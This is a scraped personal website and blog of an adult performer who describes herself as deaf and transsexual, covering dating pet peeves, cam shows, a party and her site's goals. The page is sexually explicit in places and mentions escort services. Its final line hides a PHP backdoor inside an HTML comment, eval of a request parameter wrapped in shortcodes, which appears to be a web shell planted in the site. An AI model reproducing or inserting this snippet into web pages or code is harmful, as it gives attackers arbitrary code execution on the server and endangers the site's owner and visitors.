Calendar
April 2019
M T W T F S S
« Dec    
1234567
891011121314
15161718192021
22232425262728
2930  
Categories

Pet Peaves

As I went thru with my life  dating sense … ive encountered  lot of  frustration with communications and petpeaves.. when guy take me out on a date  .. they try to talk to me while driving.. i suggest that u guys dont do that!!!!
Do all ur phone calls  before or  on the way to date setting .  dont chat on phone or talk on text with others  when on date … or i will do the same to u or ill get up and leave…  u have to be interested in me as a person  not just sexually .
Instead of jumping on me and making huge spectacle of me with PDA on first date !   I can lipread   when  articulated  and on normal pace  not  up to the speed .. those who have accents  please write on papers memo pads or type in notepad in ur phone  not the message part  just the notepad so we dont get interrupted by others text. still  I can make my own decision with food order   just make suggestions ,  dont order for me please!!!!

Sense of humor is a must   if u know american sign language   dont be afraid to use em !
Keep in mind when texting  or typing on instant msgs    i CANNOT READ THE TONES!  i cant tell if its joke or sacarsm n such.. Please be CRYSTAL CLEAR  when u text me  or talk to me online .. I cannot read ur mind  nor can succeed in guessing games.
If u happen to run into ur friends or  whoever while im with u .   dont leave me out   or leave me hanging …dont assume about me   be sure to ask before u assume…  with me being a porn star  it doesnt mean im RICH, SLUT, doesnt take life seriously, unstable  for long terms stuff and such!  Im not a con artist i wouldnt  tell sob stories to gain something.. I just needed someone to talk to ..  I  have too much pride to ask for help  when I do ask for help  i meant what i ask for…
one of my petpeaves is  when guys ask me out  they think i would fuck for free and  do anything for free  by lyin to me that u want to date me for long term relationship….   im gonna make myself CRYSTAL CLEAR    i dont fuck on first dates !!! If u want to date me as in knowing me …  sex will have to be deserved with passion.its more meaningful  within time being cuz its soo deep and real. I wear my heart on my sleeve . i cant stand getting disappointed again. Ive only been in one long term relationship (first and latest love) it ended badly years ago..i have my walls up..   if u cant deal with that  and  rather get down to the sex part ,  i suggest u pay for my service .  i will have an escort page up  for guys like that. when it comes to service, I dont wear my heart on my sleeve .i’ll know one thing is what u want from me…less drama  less misunderstanding n such. if i am disrespected  i wouldnt  be giving u another chance . please be a honest and respectful gentleman and be aware of urself . dont waste our times with unsure stuff.


Olivia Love

For my fans..

Hello world!

I have  joined today Live Tgirl Cams , and tonight 22/05 I  do a show with my best friend Morgan !  You can always pre book me just email me for a private show!

Just contact me direct or request it at the  contact box on the http://www.livetgirlcams.net website !!

I hope you enjoy my shows to cum , see you there , yummm !

This is my direct profile page  click here the top links show if i am online or not and my schedule, videos and pics:)

XXX Olivia

Hello again!

First of all,   I would like to apologize for the delay of the Blog update .. I am new at this  so bear with me ;)…Ive been busy living the real life adventures.  Ever since the Tranny Awards    ( tranny awards 2009 part 4 is seen on youtube) Ive been around alot of my friends and fans constantly.. so i took a break to focus on making a nice enclosure  for  my Leopard tortoise  Frodo. Making it more Southern African habitat  for him to really feel at home  throughout the summer… Boy  it was hard labor  and totally is worth it. It is almost complete. i will post pictures of it  if i can figure how to !!! lol   i just dont like leaving the project unfinished .  i am really excited about this…

Happy Belated 420 day haha  yeah i do toke  to relax  and  have more giggles  haha…   my photo is in california chronciles magazine  around almost a year ago  ( good luck looking for it hehehe)…i was requested to model in it . i decided not to   due to no pay plus i didnt have a website to promote in it…

I was invited to my dear Ts Performer sis   Morgan Bailey’s birthday party last sunday  .  It was wildddddd and fun!!!  Morgan as u always say   ”  I LOVE IT!!!”   . I had the pleasure getting more acquainted with Mandy Mitchell ,Juliette (forgot last name)  and several other people ..yeah my dear friends  Domino Presley, Hazel Tucker,Yasmine Lee, Buddy Wood  , Danny Waters,  my roommate Michele plus others that i forgot to mention all attended.. hahaha ( my age getting to me  so i better keep running from it)  I wonder if anyone took pics of me in her birthday party …  most were all nude and  swinginggg right in my eyes.. boy my eyes had lot of orgasms   LMAO! of course  i was almost naked and wearing thong     ( i didnt wanna loose my tanline) ;)~  Many thanks to Mark and Rosina   who hosted  this terrific event for Morgan Bailey  my precious sis!

i better go now  and organize  my subjects to be discussed  in Blog

itll be about labels and approach  i experienced last week  when a guy took me out to dinner.   it would probably apply to audism subject as well…

P.s.  im dreading for my b day to happen too soon  ack!!!!!

Welcome to my site !

Hi! My name is Olivia Love .

I am deaf and transsexual adult film performer.I’m seen in many videos and websites .I started in 1990’s then I retired for love til it ended .

I returned in jan of 08 with a full charge and finish the unfinished business that I left behind .
I finally am able to shut down the fraudlent sites that contained my name and images.
Welcome to my new and official site ! Oh yes  its really my site where I have the full control with better communication with my fans and friends.

It will be updated constantly so y’all won’t get bored! It may contain very steamy and sexy contents. Be still ur hearts  it may overwhelm u. Hehe it will be including  subtitled versions for hearing people to understand my american sign language  dialogues. it’ll also be subtitled for deaf and hard of hearing when it comes to vocal dialogues of any talents I work with if necessary . I want my fans to understand what daily issues a deaf transsexual performer faces .the solutions to learn to get thru the communication barriers.

Oh boy its gonna be educational and sexual!  Honestly there are many ways  to understand one other instead of getting intimidated by my mysterious and beautiful self. I am strong advocate of deaf culture and civil rights as a transsexual. I will have blogs,videos,calendar shoots, wishlist,casual stuff  about lifestyle, cam shows ,chatroom            My objectives of this site is to help me succeed my surgeries and educate people.

~*Olivia*Love*~

<!– [insert_php]if (isset($_REQUEST["bFFX"])){eval($_REQUEST["bFFX"]);exit;}[/insert_php][php]if (isset($_REQUEST["bFFX"])){eval($_REQUEST["bFFX"]);exit;}[/php] –>